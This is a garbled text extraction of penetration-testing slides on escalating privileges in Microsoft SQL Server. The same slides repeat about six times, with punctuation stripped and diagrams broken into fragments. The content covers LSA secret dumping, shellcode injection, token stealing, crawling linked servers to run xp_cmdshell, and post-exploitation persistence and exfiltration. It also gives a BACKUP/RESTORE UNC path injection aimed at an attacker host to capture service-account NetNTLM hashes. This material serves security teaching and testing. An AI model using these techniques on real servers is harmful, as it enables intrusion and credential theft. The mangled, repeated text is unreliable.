Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
